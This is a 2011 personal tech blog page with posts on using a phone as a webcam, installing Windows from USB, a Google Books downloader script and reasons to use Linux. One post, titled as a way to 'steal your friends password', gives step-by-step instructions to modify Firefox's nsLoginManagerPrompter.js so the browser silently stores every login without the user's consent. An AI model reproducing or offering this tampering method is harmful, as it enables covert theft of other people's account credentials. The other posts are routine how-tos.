Monday, April 25, 2011

Use Camera Phone as Wireless Webcam for Free

Use Camera Phone as Wireless Webcam for Free

Why shell out cash when you can use your camera phone as a webcam for free. Motvik has recently released a product called WWIGO (Webcam Wherever You Go), it turns your Bluetooth enabled camera phone into a wireless webcam which can be used with any application on your computer.

WWIGO is a free application and supports all Nokia S60 v2.0 and v3.0 devices. There are plenty of benefits in using WWIGO over conventional webcams: Modern camera phones are equipped with better lens and higher resolution cameras, so your camera phone will behave as high quality webcam. It works wirelessly over Bluetooth, giving you the flexibility to move your camera phone. WWIGO is a two piece application, one part is installed in your computer and second part is installed in your mobile.

WWIGO is a free alternative to commercially available Mobiola Web Camera. I’ve tried both and I found WWIGO cleaner and simpler to use. You’ll need a S60 v2.0 or v3.0 handset and Windows (XP and Vista) along with Bluetooth adapter.
Just install the client in ur phone during the installation of wwigo and enjoy.

download link 1: http://www.motvik.com/
link 2: http://www.edisk.eu/download/00157/Motvik.wwigo_laco_.rar_4.36MB.html

HOW TO TURN YOUR FIREFOX INTO KEYLOGGER TO STEAL YOUR FRIENDS PASSWORD


Generally using key logger is detected by the antivirus as malware and also consumes system resources. i ma having a trick to turn your mozilla into a key logger that will save all passwords automatically. only thing required is that u must have a master password set.
there are 2 cases in which it is helpful
1.it's ur own pc nad u have the master password(see option in menu)
2.others are using ur comp hence u want to warn them.

the major benefit is that professional key logger can't record frm the virtual keyboard but it can.
but firefox does'nt record password automatically from sites such paypal by default and hence it work in sites like facebook , orkut , gmail etc
steps

1. Go to your Mozilla Firefox installation folder. By default, Firefox 4 is installed to this folder: C:/Program Files (×86)/Mozilla Firefox/ (in Windows 7)

2. Here comes the tricky part, Firefox 4 saves most of its components in an archive called omni.jar and archive extracting tools such as the one built into Windows 7 or 7Zip fail to open or extract omni.jar. I tried WinRAR 4 and it seems to handle omni.jar without any snags. I have not tested other programs, so it’s wise to make a backup of omni.jar for the worst case scenario. Also note that WinRAR cannot extract omni.jar in system folders such as “Program Files”, so copy omni.jar to a different location before extracting it.

3. Open component > nsLoginManagerPrompter.js with a text editor (preferably the one with syntax highlight. I use Notepad++)

4. Select everything between line 800 to 869 and replace it with: var pwmgr = this._pwmgr; pwmgr.addLogin(aLogin);



5. Save the file and repack omni.jar. Again, be a careful while you repack. Do not repack “omni” folder, but repack everything inside that folder. Compress it as zip, and then rename omni.zip as omni.jar

6. Close Firefox and overwrite the old omni.jar with the one which you just modified.
How to Disable Password Save Notification Bar in Firefox 3+

Removing the password save notification in Firefox 3+ is simpler than Firefox 4 because older versions of Firefox do not compress their components in omni.jar. You can find nsLoginManagerPrompter.js normally located in C:\Program Files\Mozilla Firefox\components\

Replace line 642 to 711 with this code: var pwmgr = this._pwmgr;

pwmgr.addLogin(aLogin);




Firefox will now save all the usernames and passwords automatically without the user’s consent. You can view saved password from Firefox > Options > Security > Saved Passwords.
Things to keep in mind:

1. Use this tutorial at your own risk and responsibility.

2. Do not use this tutorial with malicious intent.

3. nsLoginManagerPrompter.js might change when you upgrade your Firefox to a newer version.

4. Use a strong master password before you disable “Remember Password” notification. Otherwise, anyone with access to your browser can see your passwords in plain text.


Sunday, April 24, 2011

How to install windows from usb







if you are dvd drive not working or u do'nt have usb pen drive no need to worry about u can install windows from usb or pen drive
u will need following:
1. virtual dvd/cd drive software lhttp://wintoflash.com/home/en/http://wintoflash.com/home/en/ike ultraiso , alcohol etc
2. iso image file of ur windows.
3. wintoflas
4 a pendrive having capacity greater than 4 gb

download link
ultraiso : http://www.ezbsystems.com/ultraiso/
win2flash :http://wintoflash.com/home/en/

steps
1.install ultraiso or alcohol or any software like these
2.install win2flash
3.mount the windows iso on the virtual drive
4.open wintoflash , start in wizard mode
give the location of the both d drives target(pen drive) , source(virtual drive) and click
next urs bootable usb is ready to install windows.
in case of any further query feel free to contact gunparashar@gmail.com

Saturday, April 23, 2011

google book downloader in mozilla

steps

1.install greasemonkey addon for mozilla "https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/"


2. install the google book downloader script "http://userscripts.org/scripts/show/37933"

3just open any google book and enjoy downloading.

If windows sucks - 5 reasons to switch over to linux

Linux is an open-source operating system, meaning the people that use it can change, develop, alter, improve and distribute it as they see fit. What this also means is that there are a wide variety of different Linux operating system options to choose from, some of which are considered to be “standard” and some of which are not. Do you need some reasons to consider using the Linux operating system?

Reason #1: Cost advantages. These are one of the most obvious advantages, because Linux is completely free to obtain, use and alter. Alternatively, Microsoft and Apple operating systems offer hefty and often recurring fees for use. You can only use a Microsoft operating system license one single time, but you can use Linux as often as you like for free.

Reason #2: Security advantages. The security aspect associated with Linux is significantly stronger in comparison to Windows. The Linux operating system has managed to remain secure despite the widespread transfer of viruses, adware and spyware.

Reason #3: Choice and freedom advantages. The power of choice is an important advantage. You can control nearly every single aspect of using the Linux operating system through the kernel and through Window Managers.

Reason #4: Software advantages. There are a wide variety of software choices that are available to you when it comes to using the Linux operating systems. For example, there are all kinds of interesting text editors, games and other software programs to try as you experiment with the operating system.

Reason #5: Hardware advantages. Linux is absolutely perfect for old computers that are lacking in terms of memory or processing power. Install Linux and use these computers for a wide variety of different purposes including as a file server, a firewall, a backup server or anything else you can think of as the possibilities are virtually endless.

Linux is an operating system well worth considering if these benefits appeal to your needs.